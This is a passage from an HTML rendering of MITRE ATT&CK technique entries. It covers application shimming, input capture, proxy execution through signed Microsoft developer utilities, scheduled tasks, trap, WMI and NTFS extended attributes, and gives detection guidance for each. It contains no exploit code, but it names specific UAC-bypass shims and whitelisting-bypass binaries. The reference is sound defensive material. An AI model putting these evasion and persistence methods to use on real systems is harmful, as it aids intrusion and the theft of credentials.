<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_shimming_t1138"><a class="anchor" href="#_application_shimming_t1138"></a><a class="link" href="#_application_shimming_t1138">Application Shimming - T1138</a></h3>
<div class="paragraph">
<p>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow backward compatibility of programs as Windows updates and changes its code. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Engame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses Hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>&lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;</p>
</li>
<li>
<p>&lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Custom databases are stored in:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>&lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;</p>
</li>
<li>
<p>&lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</p>
</div>
<div class="paragraph">
<p>Detection: There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shim-Process-Scanner - checks memory of every running process for any Shim flags</p>
</li>
<li>
<p>Shim-Detector-Lite - detects installation of custom shim databases</p>
</li>
<li>
<p>Shim-Guard - monitors registry for any shim installations</p>
</li>
<li>
<p>ShimScanner - forensic tool to find active shims in memory</p>
</li>
<li>
<p>ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, System calls, Windows Registry, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 740. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1138">https://attack.mitre.org/wiki/Technique/T1138</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf">https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_input_capture_t1056"><a class="anchor" href="#_input_capture_t1056"></a><a class="link" href="#_input_capture_t1056">Input Capture - T1056</a></h3>
<div class="paragraph">
<p>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.</p>
</div>
<div class="paragraph">
<p>Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)</p>
</div>
<div class="paragraph">
<p>Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.</p>
</div>
<div class="paragraph">
<p>Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)</p>
</div>
<div class="paragraph">
<p>Detection: Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState. (Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</p>
</div>
<div class="paragraph">
<p>Monitor the Registry for the addition of a Custom Credential Provider. (Citation: Wrightson 2012) Detection of compromised Valid Accounts in use by adversaries may help to catch the result of user input interception if new techniques are used.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Kernel drivers, Process monitoring, API monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 741. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1056">https://attack.mitre.org/wiki/Technique/T1056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/">http://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/">https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regsvcs_regasm_t1121"><a class="anchor" href="#_regsvcs_regasm_t1121"></a><a class="link" href="#_regsvcs_regasm_t1121">Regsvcs/Regasm - T1121</a></h3>
<div class="paragraph">
<p>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)</p>
</div>
<div class="paragraph">
<p>Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 742. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1121">https://attack.mitre.org/wiki/Technique/T1121</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/04za0hca.aspx">https://msdn.microsoft.com/en-us/library/04za0hca.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx">https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trusted_developer_utilities_t1127"><a class="anchor" href="#_trusted_developer_utilities_t1127"></a><a class="link" href="#_trusted_developer_utilities_t1127">Trusted Developer Utilities - T1127</a></h3>
<div class="paragraph">
<p>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.</p>
</div>
<div class="paragraph">
<p>===MSBuild===</p>
</div>
<div class="paragraph">
<p>MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild)</p>
</div>
<div class="paragraph">
<p>Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)</p>
</div>
<div class="paragraph">
<p>===DNX===</p>
</div>
<div class="paragraph">
<p>The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)</p>
</div>
<div class="paragraph">
<p>===RCSI===</p>
</div>
<div class="paragraph">
<p>The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)</p>
</div>
<div class="paragraph">
<p>C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)</p>
</div>
<div class="paragraph">
<p>===WinDbg/CDB===</p>
</div>
<div class="paragraph">
<p>WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)</p>
</div>
<div class="paragraph">
<p>It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>===Tracker===</p>
</div>
<div class="paragraph">
<p>The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)</p>
</div>
<div class="paragraph">
<p>An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)</p>
</div>
<div class="paragraph">
<p>Detection: The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</p>
</div>
<div class="paragraph">
<p>Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>System Requirements: MSBuild: .NET Framework version 4 or higher
DNX: .NET 4.5.2, Powershell 4.0
RCSI: .NET 4.5 or later, Visual Studio 2012</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith, Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 743. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1127">https://attack.mitre.org/wiki/Technique/T1127</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html">http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/dd393574.aspx">https://msdn.microsoft.com/library/dd393574.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index">https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/visualstudio/msbuild/file-tracking">https://docs.microsoft.com/visualstudio/msbuild/file-tracking</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/en-us/dotnet/core/migration/from-dnx">https://docs.microsoft.com/en-us/dotnet/core/migration/from-dnx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.msdn.microsoft.com/visualstudio/2011/10/19/introducing-the-microsoft-roslyn-ctp/">https://blogs.msdn.microsoft.com/visualstudio/2011/10/19/introducing-the-microsoft-roslyn-ctp/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/subTee/status/793151392185589760">https://twitter.com/subTee/status/793151392185589760</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/">https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/">https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_network_configuration_discovery_t1016"><a class="anchor" href="#_system_network_configuration_discovery_t1016"></a><a class="link" href="#_system_network_configuration_discovery_t1016">System Network Configuration Discovery - T1016</a></h3>
<div class="paragraph">
<p>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 744. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1016">https://attack.mitre.org/wiki/Technique/T1016</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scheduled_task_t1053"><a class="anchor" href="#_scheduled_task_t1053"></a><a class="link" href="#_scheduled_task_t1053">Scheduled Task - T1053</a></h3>
<div class="paragraph">
<p>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. (Citation: TechNet Task Scheduler Security)</p>
</div>
<div class="paragraph">
<p>An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in &lt;code&gt;%systemroot%\System32\Tasks&lt;/code&gt; for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)</p>
</div>
<div class="paragraph">
<p>*Event ID 106 - Scheduled task registered
*Event ID 140 - Scheduled task updated
*Event ID 141 - Scheduled task removed</p>
</div>
<div class="paragraph">
<p>Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Process monitoring, Windows event logs</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire, Leo Loobeek, @leoloobeek</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 745. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1053">https://attack.mitre.org/wiki/Technique/T1053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen">https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/dd315590.aspx">https://technet.microsoft.com/library/dd315590.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc785125.aspx">https://technet.microsoft.com/en-us/library/cc785125.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/leoloobeek/status/939248813465853953">https://twitter.com/leoloobeek/status/939248813465853953</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trap_t1154"><a class="anchor" href="#_trap_t1154"></a><a class="link" href="#_trap_t1154">Trap - T1154</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.</p>
</div>
<div class="paragraph">
<p>Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 746. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1154">https://attack.mitre.org/wiki/Technique/T1154</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_t1047"><a class="anchor" href="#_windows_management_instrumentation_t1047"></a><a class="link" href="#_windows_management_instrumentation_t1047">Windows Management Instrumentation - T1047</a></h3>
<div class="paragraph">
<p>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)</p>
</div>
<div class="paragraph">
<p>An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: WMI service, winmgmt, running.
Host/network firewalls allowing SMB and WMI ports from source to destination.
SMB authentication.</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 747. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1047">https://attack.mitre.org/wiki/Technique/T1047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Server%20Message%20Block">https://en.wikipedia.org/wiki/Server%20Message%20Block</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc787851.aspx">https://technet.microsoft.com/en-us/library/cc787851.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa394582.aspx">https://msdn.microsoft.com/en-us/library/aa394582.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ntfs_extended_attributes_t1096"><a class="anchor" href="#_ntfs_extended_attributes_t1096"></a><a class="link" href="#_ntfs_extended_attributes_t1096">NTFS Extended Attributes - T1096</a></h3>
<div class="paragraph">
<p>Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA)</p>
</div>
<div class="paragraph">
<p>The NTFS format has a feature called Extended Attributes (EA), which allows data to be stored as an attribute of a file or folder. (Citation: Microsoft File Streams)</p>
</div>
<div class="paragraph">
<p>Detection: Forensic techniques exist to identify information stored in EA. (Citation: Journey into IR ZeroAccess NTFS EA) It may be possible to monitor NTFS for writes or reads to NTFS EA or to regularly scan for the presence of modified information.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Kernel drivers</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Signature-based detection, Anti-virus, Host forensic analysis</p>
</div>
<div class="paragraph">
<p>System Requirements: NTFS partitioned hard drive</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 748. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1096">https://attack.mitre.org/wiki/Technique/T1096</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html">http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html</a></p></td>
</tr>
<tr>
